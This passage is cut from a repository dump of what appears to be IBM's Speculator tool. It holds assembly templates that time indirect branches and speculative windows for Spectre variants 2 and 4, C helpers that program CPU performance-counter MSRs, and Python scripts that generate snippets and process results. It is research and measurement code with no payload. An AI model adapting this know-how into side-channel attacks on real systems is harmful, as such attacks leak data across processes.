inc DWORD[warmup_cnt] 64 | cmp DWORD[warmup_cnt], 13 65 | jl .data 66 | 67 | msr_close 68 | exit 0 69 | -------------------------------------------------------------------------------- /examples/v2_various_uncond_cycles/v2_uncond_cached.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | address: dq 0 26 | address2: dq 0 27 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 28 | fd: dq 0 29 | val: dq 0 30 | len: equ $-val 31 | lea_array: times 40 db 0 32 | junk: db 1 33 | ;##### DATA STARTS HERE ######## 34 | 35 | ;##### DATA ENDS HERE ######## 36 | 37 | section .text 38 | global perf_test_entry:function 39 | global func:function 40 | global func2:function 41 | global snippet:function 42 | 43 | perf_test_entry: 44 | push rbp 45 | mov rbp, rsp 46 | sub rsp, len 47 | 48 | check_pinning VICTIM_PROCESS 49 | msr_open 50 | msr_seek 51 | .data: 52 | mov eax, 0 53 | cpuid 54 | lfence 55 | mov QWORD[address], func 56 | cmp DWORD[warmup_cnt], 12 57 | je .start 58 | mov QWORD[address], func2 59 | .start: 60 | lfence 61 | reset_counter 62 | start_counter 63 | call [address] 64 | stop_counter 65 | 66 | inc DWORD[warmup_cnt] 67 | cmp DWORD[warmup_cnt], 13 68 | jl .data 69 | 70 | msr_close 71 | exit 0 72 | 73 | func: 74 | xor eax, eax 75 | ret 76 | 77 | func2: 78 | mov eax, 0 79 | ret 80 | -------------------------------------------------------------------------------- /examples/v2_various_uncond_cycles/v2_uncond_register.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global func:function 39 | global func2:function 40 | global snippet:function 41 | 42 | perf_test_entry: 43 | push rbp 44 | mov rbp, rsp 45 | sub rsp, len 46 | 47 | check_pinning VICTIM_PROCESS 48 | msr_open 49 | msr_seek 50 | .data: 51 | mov eax, 0 52 | cpuid 53 | lfence 54 | mov r15, func 55 | cmp DWORD[warmup_cnt], 12 56 | je .start 57 | mov r15, func2 58 | .start: 59 | lfence 60 | reset_counter 61 | start_counter 62 | call r15 63 | stop_counter 64 | 65 | inc DWORD[warmup_cnt] 66 | cmp DWORD[warmup_cnt], 13 67 | jl .data 68 | 69 | msr_close 70 | exit 0 71 | 72 | func: 73 | xor eax, eax 74 | ret 75 | 76 | func2: 77 | mov eax, 0 78 | ret 79 | -------------------------------------------------------------------------------- /examples/v2_various_uncond_cycles/v2_uncond_uncached.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | address: dq 0 26 | address2: dq 0 27 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 28 | fd: dq 0 29 | val: dq 0 30 | len: equ $-val 31 | lea_array: times 40 db 0 32 | junk: db 1 33 | ;##### DATA STARTS HERE ######## 34 | 35 | ;##### DATA ENDS HERE ######## 36 | 37 | section .text 38 | global perf_test_entry:function 39 | global func:function 40 | global func2:function 41 | global snippet:function 42 | 43 | perf_test_entry: 44 | push rbp 45 | mov rbp, rsp 46 | sub rsp, len 47 | 48 | check_pinning VICTIM_PROCESS 49 | msr_open 50 | msr_seek 51 | .data: 52 | mov eax, 0 53 | cpuid 54 | lfence 55 | mov QWORD[address], func 56 | cmp DWORD[warmup_cnt], 12 57 | je .start 58 | mov QWORD[address], func2 59 | .start: 60 | lfence 61 | clflush [address] 62 | lfence 63 | reset_counter 64 | start_counter 65 | call [address] 66 | stop_counter 67 | 68 | inc DWORD[warmup_cnt] 69 | cmp DWORD[warmup_cnt], 13 70 | jl .data 71 | 72 | msr_close 73 | exit 0 74 | 75 | func: 76 | xor eax, eax 77 | ret 78 | 79 | func2: 80 | mov eax, 0 81 | ret 82 | -------------------------------------------------------------------------------- /examples/v4_cycles/v4_cycles.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dq 1 24 | fill2: times 60 db 0 25 | 26 | array: times 64 db 0 27 | 28 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 29 | fd: dq 0 30 | offset: dq 0 31 | val: dq 0 32 | len: equ $-val 33 | ;##### DATA STARTS HERE ######## 34 | 35 | ;##### DATA ENDS HERE ######## 36 | 37 | section .text 38 | global perf_test_entry:function 39 | global snippet:function 40 | 41 | perf_test_entry: 42 | push rbp 43 | mov rbp, rsp 44 | sub rsp, len 45 | 46 | check_pinning VICTIM_PROCESS 47 | msr_open 48 | msr_seek 49 | lfence 50 | pipeline_flush 51 | reset_counter 52 | start_counter 53 | mov rsi, fill2 54 | mov rdi, fill2 55 | mov rax, rdi 56 | xor rdx, rdx 57 | mov rcx, 2 58 | div rcx 59 | mov rdi, rax 60 | mov rax, 2 61 | mov rcx, 10 62 | mul rdi 63 | mov rdi, rax 64 | mov rdx, fill 65 | mov al, 0x10 66 | mov [rdi+rcx], al 67 | movzx r8, byte[rsi+rcx] 68 | shl r8, byte 0x1 69 | ;##### SNIPPET STARTS HERE ###### 70 | 71 | ;##### SNIPPET ENDS HERE ###### 72 | 73 | ; UNCOMMENT TO TEST CYCLES span for speculation 74 | 75 | mov QWORD[warmup_cnt_fake], rdx 76 | mov DWORD[warmup_cnt_fake + 4], edx 77 | mov rax, QWORD[warmup_cnt_fake] 78 | 79 | ; OR 80 | 81 | ;mulps xmm0,xmm1 82 | 83 | stop_counter 84 | 85 | msr_close 86 | exit 0 87 | -------------------------------------------------------------------------------- /examples/v4_cycles/v4_cycles.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0", 4 | "something2: dq 0" 5 | ], 6 | 7 | "INST": [ 8 | "fnop", 9 | "fnop", 10 | "fnop", 11 | "fnop", 12 | "fnop", 13 | "fnop", 14 | "fnop", 15 | "fnop", 16 | "fnop", 17 | "fnop", 18 | "fnop", 19 | "fnop", 20 | "fnop", 21 | "fnop", 22 | "fnop", 23 | "fnop", 24 | "fnop", 25 | "fnop", 26 | "fnop", 27 | "fnop", 28 | "fnop", 29 | "fnop", 30 | "fnop", 31 | "fnop", 32 | "fnop", 33 | "fnop", 34 | "fnop", 35 | "fnop", 36 | "fnop", 37 | "fnop", 38 | "fnop", 39 | "fnop", 40 | "fnop", 41 | "fnop", 42 | "fnop", 43 | "fnop", 44 | "fnop", 45 | "fnop", 46 | "fnop", 47 | "fnop", 48 | "fnop", 49 | "fnop", 50 | "fnop", 51 | "fnop", 52 | "fnop", 53 | "fnop", 54 | "fnop", 55 | "fnop", 56 | "fnop", 57 | "fnop", 58 | "fnop", 59 | "fnop", 60 | "fnop", 61 | "fnop", 62 | "fnop", 63 | "fnop", 64 | "fnop", 65 | "fnop", 66 | "fnop", 67 | "fnop", 68 | "fnop", 69 | "fnop", 70 | "fnop", 71 | "fnop", 72 | "fnop", 73 | "fnop", 74 | "fnop", 75 | "fnop", 76 | "fnop", 77 | "fnop", 78 | "fnop", 79 | "fnop", 80 | "fnop", 81 | "fnop", 82 | "fnop", 83 | "fnop", 84 | "fnop", 85 | "fnop", 86 | "fnop", 87 | "fnop", 88 | "fnop", 89 | "fnop", 90 | "fnop", 91 | "fnop", 92 | "fnop", 93 | "fnop", 94 | "fnop", 95 | "fnop", 96 | "fnop", 97 | "fnop", 98 | "fnop", 99 | "fnop", 100 | "fnop", 101 | "fnop", 102 | "fnop", 103 | "fnop", 104 | "fnop", 105 | "fnop", 106 | "fnop", 107 | "fnop", 108 | "fnop", 109 | "fnop", 110 | "fnop", 111 | "fnop", 112 | "fnop", 113 | "fnop", 114 | "fnop", 115 | "fnop", 116 | "fnop", 117 | "fnop", 118 | "fnop", 119 | "fnop", 120 | "fnop", 121 | "fnop", 122 | "fnop", 123 | "fnop", 124 | "fnop", 125 | "fnop", 126 | "fnop", 127 | "fnop", 128 | "fnop", 129 | "fnop", 130 | "fnop", 131 | "fnop", 132 | "fnop", 133 | "fnop", 134 | "fnop", 135 | "fnop", 136 | "fnop", 137 | "fnop", 138 | "fnop", 139 | "fnop", 140 | "fnop", 141 | "fnop", 142 | "fnop", 143 | "fnop", 144 | "fnop", 145 | "fnop", 146 | "fnop", 147 | "fnop", 148 | "fnop", 149 | "fnop", 150 | "fnop", 151 | "fnop", 152 | "fnop", 153 | "fnop", 154 | "fnop", 155 | "fnop", 156 | "fnop", 157 | "fnop", 158 | "fnop", 159 | "fnop", 160 | "fnop", 161 | "fnop", 162 | "fnop", 163 | "fnop", 164 | "fnop", 165 | "fnop", 166 | "fnop", 167 | "fnop", 168 | "fnop", 169 | "fnop", 170 | "fnop", 171 | "fnop", 172 | "fnop", 173 | "fnop", 174 | "fnop", 175 | "fnop", 176 | "fnop", 177 | "fnop", 178 | "fnop", 179 | "fnop", 180 | "fnop", 181 | "fnop", 182 | "fnop", 183 | "fnop", 184 | "fnop", 185 | "fnop", 186 | "fnop", 187 | "fnop", 188 | "fnop", 189 | "fnop", 190 | "fnop", 191 | "fnop", 192 | "fnop", 193 | "fnop", 194 | "fnop", 195 | "fnop", 196 | "fnop", 197 | "fnop", 198 | "fnop", 199 | "fnop", 200 | "fnop", 201 | "fnop" 202 | ] 203 | } 204 | -------------------------------------------------------------------------------- /include/amd.h: -------------------------------------------------------------------------------- 1 | // Copyright 2021 IBM Corporation 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #ifndef AMD_H 16 | #define AMD_H 17 | 18 | // AMD MSRs for performance monitoring 19 | #define PerfEvtSel0 0xc0010000 // Event select registers (4 in total - 0xc0010003) 20 | #define PerfCtr0 0xc0010004 // Performance counters (4 in total - 0xc0010007) 21 | 22 | // AMD PerfEvtSel register fields 23 | #define PERF_EVENT_SELECT 0x000000ff // Unit and Event Selection 24 | #define PERF_UNIT_MASK 0x0000ff00 // Event Qualification 25 | #define PERF_USR 0x00010000 // User mode 26 | #define PERF_OS 0x00020000 // Operating-System Mode 27 | #define PERF_E 0x00040000 // Edge Detect 28 | #define PERF_PC 0x00080000 // Pin Control 29 | #define PERF_INT 0x00100000 // Enable APIC Interrupt 30 | #define PERF_EN 0x00400000 // Enable Counter 31 | #define PERF_INV 0x00800000 // Invert Counter Mask 32 | #define PERF_CNT_MASK 0xff000000 // Counter Mask 33 | 34 | void write_to_AMD_PMCi(int fd, uint8_t i, uint64_t val) { 35 | int rv = 0; 36 | 37 | rv = pwrite(fd, &val, sizeof(val), PerfCtr0+i); 38 | 39 | if (rv != sizeof(val)) { 40 | fprintf (stderr, "Impossible to write AMD ctr register\n"); 41 | exit(EXIT_FAILURE); 42 | } 43 | } 44 | 45 | void write_to_AMD_PERFEVTSELi(int fd, uint8_t i, uint64_t val) { 46 | int rv = 0; 47 | 48 | rv = pwrite(fd, &val, sizeof(val), PerfEvtSel0+i); 49 | 50 | if (rv != sizeof(val)) { 51 | fprintf (stderr, "Impossible to write AMD sel register\n"); 52 | exit(EXIT_FAILURE); 53 | } 54 | } 55 | 56 | uint64_t read_AMD_PMCi(int fd, uint8_t i) { 57 | int rv = 0; 58 | uint64_t ret = -1; 59 | 60 | rv = pread(fd, &ret, sizeof(ret), PerfCtr0 + i); 61 | 62 | if (rv != sizeof(ret)) { 63 | fprintf (stderr, "Impossible to read AMD perf counter\n"); 64 | exit(EXIT_FAILURE); 65 | } 66 | 67 | return ret; 68 | } 69 | 70 | #endif // AMD_H 71 | -------------------------------------------------------------------------------- /include/config.h.in: -------------------------------------------------------------------------------- 1 | // Copyright 2021 IBM Corporation 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | #ifndef CONFIG_H 15 | #define CONFIG_H 16 | 17 | #cmakedefine DUMMY_NAME "@DUMMY_NAME@" 18 | #define ATTACKER_CORE @ATTACKER_CORE@ul 19 | #define VICTIM_CORE @VICTIM_CORE@ul 20 | 21 | #define SPECULATOR_VER "@SPECULATOR_VERSION@" 22 | #define SPECULATOR_VER_MAJ "@SPECULATOR_VERSION_MAJOR@" 23 | #define SPECULATOR_VER_MIN "@SPECULATOR_VERSION_MINOR@" 24 | #define SPECULATOR_VER_PATCH "@SPECULATOR_VERSION_PATCH@" 25 | 26 | 27 | #endif //CONFIG_H 28 | -------------------------------------------------------------------------------- /include/intel.h: -------------------------------------------------------------------------------- 1 | // Copyright 2021 IBM Corporation 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #ifndef INTEL_H 16 | #define INTEL_H 17 | 18 | #define FIXED_COUNTERS 3 19 | 20 | const char *intel_fixed_counters[] = {"INSTRUCTIONS_RETIRED", "CYCLES", "UNKNOWN"}; 21 | 22 | void 23 | write_to_IA32_PERF_GLOBAL_CTRL(int fd, 24 | uint64_t val) { 25 | int rv = 0; 26 | 27 | rv = pwrite(fd, &val, sizeof(val), 0x38F); 28 | 29 | if (rv != sizeof(val)) { 30 | fprintf (stderr, "Impossible to write IA32_PERF_GLOBAL_CTRL\n"); 31 | exit(EXIT_FAILURE); 32 | } 33 | } 34 | 35 | void 36 | write_to_IA32_PMCi(int fd, 37 | uint8_t i, 38 | uint64_t val) { 39 | int rv = 0; 40 | 41 | rv = pwrite(fd, &val, sizeof(val), 0xC1 + i); 42 | 43 | if (rv != sizeof(val)) { 44 | fprintf (stderr, "Impossible to write IA32_PMCi\n"); 45 | exit(EXIT_FAILURE); 46 | } 47 | } 48 | 49 | uint64_t 50 | read_IA32_PMCi(int fd, 51 | uint8_t i) { 52 | int rv = 0; 53 | uint64_t ret = -1; 54 | 55 | rv = pread(fd, &ret, sizeof(ret), 0xC1 + i); 56 | 57 | if (rv != sizeof(ret)) { 58 | fprintf (stderr, "Impossible to read IA32_PMCi\n"); 59 | exit(EXIT_FAILURE); 60 | } 61 | 62 | return ret; 63 | } 64 | 65 | void 66 | write_to_IA32_FIXED_CTRi(int fd, 67 | int i, 68 | uint64_t val) { 69 | int rv; 70 | 71 | rv = pwrite(fd, &val, sizeof(val), 0x309 + i); 72 | 73 | if (rv != sizeof(val)) { 74 | fprintf (stderr, "Impossible to write IA32_PMCi\n"); 75 | exit(EXIT_FAILURE); 76 | } 77 | } 78 | 79 | void 80 | write_to_IA32_FIXED_CTR_CTRL(int fd, 81 | uint64_t val) { 82 | int rv; 83 | 84 | rv = pwrite(fd, &val, sizeof(val), 0x38D); 85 | 86 | if (rv != sizeof(val)) { 87 | fprintf (stderr, "Impossible to write IA32_PMCi\n"); 88 | exit(EXIT_FAILURE); 89 | } 90 | } 91 | 92 | uint64_t 93 | read_IA32_FIXED_CTRi(int fd, 94 | int i) { 95 | int rv; 96 | uint64_t ret = -1; 97 | 98 | rv = pread(fd, &ret, sizeof(ret), 0x309 + i); 99 | 100 | if (rv != sizeof(ret)) { 101 | fprintf (stderr, "Impossible to read IA32_PMCi\n"); 102 | exit(EXIT_FAILURE); 103 | } 104 | return ret; 105 | } 106 | 107 | void 108 | write_to_IA32_PERFEVTSELi(int fd, 109 | uint8_t i, 110 | uint64_t val) { 111 | int rv; 112 | 113 | rv = pwrite(fd, &val, sizeof(val), 0x186 + i); 114 | 115 | if (rv != sizeof(val)) { 116 | fprintf (stderr, "Impossible to write IA32_PERFEVTSELi\n"); 117 | exit (EXIT_FAILURE); 118 | } 119 | } 120 | 121 | #endif //INTEL_H 122 | -------------------------------------------------------------------------------- /scripts/cr_inc_snip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | # Copyright 2021 IBM Corporation 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # http://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | import os 18 | import json 19 | import errno 20 | import argparse 21 | 22 | basename = "" 23 | 24 | def get_index(template): 25 | idx_code = -1 26 | idx_data = -1 27 | with open(template, "r") as f: 28 | for i, line in enumerate(f, 1): 29 | if "SNIPPET STARTS HERE" in line: 30 | idx_code = i + 1 31 | 32 | if "DATA STARTS HERE" in line: 33 | idx_data = i + 1 34 | return (idx_data, idx_code) 35 | 36 | def update_data(template, idx_data, idx_code, snippet_json): 37 | if "DATA" not in snippet_json: 38 | print ("The json file loaded has no data object specified") 39 | return (template, idx_data, idx_code) 40 | 41 | for line in snippet_json["DATA"]: 42 | template.insert(idx_data, "\t" + line + "\n") 43 | idx_data = idx_data + 1 44 | idx_code = idx_code + 1 45 | 46 | return (template, idx_data, idx_code) 47 | 48 | def update_code(args, template, idx_data, idx_code, snippet_json): 49 | global basename 50 | if "INST" not in snippet_json: 51 | print("The json file loaded has no INST object specified") 52 | exit(-1) 53 | 54 | for i, line in enumerate(snippet_json["INST"], 1): 55 | template.insert(idx_code, "\t" + line + "\n") 56 | idx_code = idx_code + 1 57 | unit = "0" if i in range(0, 10) else "" 58 | dec = "0" if i in range(0, 100) else "" 59 | cent = "0" if i in range (0, 1000) else "" 60 | path = os.path.join(args.output, basename+"_"+ cent + dec + unit + str(i)+".asm") 61 | with open(path, "w") as f: 62 | for line in template: 63 | f.write(line) 64 | return (template, idx_data, idx_code) 65 | 66 | def extract_basename(json_file): 67 | return os.path.basename(json_file).split('.')[0] 68 | 69 | def main(): 70 | global basename 71 | parser = argparse.ArgumentParser(description='This scripts load a json with' 72 | 'snippet structure and create multiple' 73 | 'incremental snippets') 74 | parser.add_argument('json', help='json file that contains the snippet to be split') 75 | parser.add_argument('template', help='template file to be complete with the snippet') 76 | parser.add_argument('--output', '-o', help='output location', default=".") 77 | args = parser.parse_args() 78 | 79 | if not args.json.endswith(".json"): 80 | print ("The file name must have .json extension") 81 | exit(-1) 82 | 83 | if not os.path.isfile(args.json): 84 | print ("Json file does not exists\n") 85 | exit(-1) 86 | 87 | if not os.path.isfile(args.template): 88 | print ("Template file does not exits\n") 89 | exit(-1) 90 | 91 | if not os.path.exists(args.output): 92 | print ("The output folder specified does not exist. It will be created.") 93 | try: 94 | os.makedirs(args.output) 95 | except OSError as e: 96 | if e.errno != errno.EEXIST: 97 | exit(-1) 98 | 99 | basename = extract_basename(args.json) 100 | 101 | with open(args.json, "r") as fp: 102 | snippet_json = json.load(fp) 103 | 104 | (idx_data, idx_code) = get_index(args.template) 105 | 106 | if idx_data == -1 or idx_code == -1: 107 | print ("Wrong template format. Please provide the right template") 108 | exit(-1) 109 | 110 | with open(args.template, "r") as f: 111 | template_base = f.readlines() 112 | 113 | (template_base, idx_data, idx_code) = update_data(template_base, idx_data, 114 | idx_code, snippet_json) 115 | 116 | # print ("idx_data = {}, idx_code = {}".format(idx_data, idx_code)) 117 | 118 | (template_base, idx_data, idx_code) = update_code(args, template_base, idx_data, 119 | idx_code, snippet_json) 120 | 121 | if __name__ == "__main__": 122 | main() 123 | -------------------------------------------------------------------------------- /scripts/post-processing-exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | # Copyright 2021 IBM Corporation 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # http://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | import os 18 | import argparse 19 | 20 | 21 | from numpy import std 22 | from numpy import mean 23 | from numpy import average 24 | from collections import defaultdict 25 | 26 | results_misspr = [] 27 | results_pr = [] 28 | result = [] 29 | 30 | def main(): 31 | global results 32 | parser = argparse.ArgumentParser() 33 | parser.add_argument("--location", "-l", 34 | required=True, 35 | help="Specify the result directory to be process") 36 | 37 | arg = parser.parse_args() 38 | 39 | try: 40 | with open(os.path.join(arg.location, "final_results.txt"), "w") as final: 41 | for dirname, dirnames, filenames in os.walk(arg.location): 42 | for f in filenames: 43 | if f == "final_results.txt": 44 | continue 45 | print ("Considering {}".format(f)) 46 | with open(os.path.join(dirname, f), "r") as res_file: 47 | lines = res_file.readlines() 48 | results_misspr = defaultdict(list) 49 | results_pr = defaultdict(list) 50 | result = defaultdict(list) 51 | for l in lines: 52 | splitted_line = l.split("|") 53 | splitted_line = splitted_line[:-1] 54 | result = defaultdict(list) 55 | for item in splitted_line: 56 | category, res = item.split(":") 57 | 58 | result[category].append(int(res)) 59 | 60 | if (category == "BR_MISP_RETIRED.ALL_BRANCHES"): 61 | if int(res) == 1: 62 | for k, v in result.items(): 63 | results_misspr[k].append(v) 64 | else: 65 | for k, v in result.items(): 66 | results_pr[k].append(v) 67 | 68 | # final.write ("######### {} ###########\n".format(f)) 69 | print ("Computing predicted for {}".format(f)) 70 | # final.write ("PREDICTED CORRECTLY\n") 71 | for category, res in results_pr.items(): 72 | len_ = f.rpartition('_')[2] 73 | if category == "UOPS_EXECUTED.CORE" or \ 74 | category == "UOPS_EXECUTED.THREAD": 75 | if "only" in f : 76 | pre = "NOBR:PRE" 77 | else: 78 | pre = "BR:PRE" 79 | res_mean = mean(res, axis=0) 80 | res_std = std(res, axis=0) 81 | res_final = [x for x in res 82 | if (x >= res_mean - 2 * res_std)] 83 | res_final = [x for x in res_final 84 | if (x <= res_mean + 2 * res_std)] 85 | final.write("{}:{}:{}\n" 86 | .format(len_, 87 | pre, 88 | average(res_final)#, 89 | # std(res_final) 90 | ) 91 | ) 92 | 93 | print ("Computing miss-predicted for {}".format(f)) 94 | # final.write ("\nMISS-PREDICTED\n") 95 | for category, res in results_misspr.items(): 96 | len_ = f.rpartition('_')[2] 97 | if category == "UOPS_EXECUTED.CORE" or \ 98 | category == "UOPS_EXECUTED.THREAD": 99 | if "only" in f : 100 | pre = "NOBR:MISS" 101 | else: 102 | pre = "BR:MISS" 103 | res_mean = mean(res, axis=0) 104 | res_std = std(res, axis=0) 105 | res_final = [x for x in res 106 | if (x >= res_mean - 2 * res_std)] 107 | res_final = [x for x in res_final 108 | if (x <= res_mean + 2 * res_std)] 109 | final.write("{}:{}:{}\n" 110 | .format(len_, 111 | pre, 112 | average(res_final) 113 | # std(res_final) 114 | ) 115 | ) 116 | # final.write ("---------------------------------------------------------\n") 117 | except IOError: 118 | print ("Error while opening {}".format(arg.input)) 119 | exit(-1) 120 | 121 | 122 | if __name__ == "__main__": 123 | main() 124 | -------------------------------------------------------------------------------- /scripts/post-processing.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Copyright 2021 IBM Corporation 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # http://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | import os 18 | # import csv 19 | import argparse 20 | 21 | from numpy import std 22 | from numpy import mean 23 | from numpy import average 24 | 25 | from sqlalchemy import or_ 26 | from sqlalchemy import Table 27 | from sqlalchemy import select 28 | from sqlalchemy import Column 29 | from sqlalchemy import Integer 30 | from sqlalchemy import MetaData 31 | from sqlalchemy import create_engine 32 | 33 | results = [] 34 | single_line = dict() 35 | tab = [] 36 | 37 | UOPS_EXECUTED = "" 38 | 39 | def main(): 40 | global results 41 | global UOPS_EXECUTED 42 | parser = argparse.ArgumentParser() 43 | parser.add_argument("--location", "-l", 44 | required=True, 45 | help="Specify the result directory to be process") 46 | parser.add_argument("--thread", "-t", 47 | action='store_true', 48 | help="Specify that UOPS_EXECUTED.TREAD should be used \ 49 | instead") 50 | 51 | arg = parser.parse_args() 52 | 53 | 54 | if arg.thread: 55 | UOPS_EXECUTED = "UOPS_EXECUTED.THREAD" 56 | else: 57 | UOPS_EXECUTED = "UOPS_EXECUTED.CORE" 58 | # Connecting to the in-memory db 59 | engine = create_engine('sqlite:///:memory:', echo=False) 60 | conn = engine.connect() 61 | metadata = MetaData(bind=engine) 62 | 63 | try: 64 | with open(os.path.join(arg.location, "final_results.txt"), "w") as final: 65 | for dirname, dirnames, filenames in os.walk(arg.location): 66 | for f in sorted(filenames): 67 | if f == "final_results.txt": 68 | continue 69 | print ("Considering {}".format(f)) 70 | with open(os.path.join(dirname, f), "r") as res_file: 71 | lines = res_file.readlines() 72 | 73 | first = True 74 | tab = [] 75 | for l in lines: 76 | if first: 77 | categories = l.split("|") 78 | categories = categories[:-1] 79 | first = False 80 | table = Table(f, metadata, 81 | Column('id', Integer, autoincrement=True, primary_key=True), 82 | *(Column(counter_name, Integer()) for 83 | counter_name in categories) 84 | ) 85 | table.create() 86 | metadata.create_all(engine) 87 | else: 88 | i = 0 89 | single_line = dict() 90 | 91 | splitted_line = l.split("|") 92 | splitted_line = splitted_line[:-1] 93 | 94 | for item in splitted_line: 95 | single_line[categories[i]] = item 96 | i = i + 1 97 | 98 | tab.append(single_line) 99 | conn.execute(table.insert(), tab) 100 | 101 | # Pull CYCLES column to compute mean and std 102 | sql = select([table.c.CYCLES, 103 | table.c[UOPS_EXECUTED]]) 104 | cycles_res = 